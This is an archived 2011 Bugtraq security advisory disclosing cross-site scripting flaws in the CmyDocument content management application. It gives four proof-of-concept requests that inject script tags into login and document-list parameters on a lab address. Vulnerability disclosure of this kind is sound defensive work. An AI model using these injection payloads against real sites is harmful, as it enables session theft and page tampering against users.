| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201111022302.pA2N22l2022642@sf01web2.securityfocus.com>
Date: Wed, 2 Nov 2011 23:02:02 GMT
From: demonalex@....com
To: bugtraq@...urityfocus.com
Subject: CmyDocument Content Management Application - XSS Vulnerabilities
Title: CmyDocument Content Management Application - XSS Vulnerabilities
Software : CmyDocument Content Management Application
Software Version : Unknown(version update : 2010-01-10)
Vendor: http://cmydocument.com/
Vulnerability Published : 2011-07-11
Vulnerability Update Time :
Status :
Impact : Medium
Bug Description :
CmyDocument Content Management Application(version update : 2010-01-10, possibly earlier versions) is vulnerable to XSS.
Proof Of Concept :
1)username in login.asp,PoC:
POST http://192.168.10.202/login.asp
------------------------------------
username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++
2)username in login2.asp,PoC:
POST http://192.168.10.202/login2.asp
------------------------------------
username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++
3)x_Revised in myDoclist.asp,PoC:
http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
4)x_Revised in myWebDoclist.asp,PoC:
http://192.168.10.202/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK
Powered by blists - more mailing lists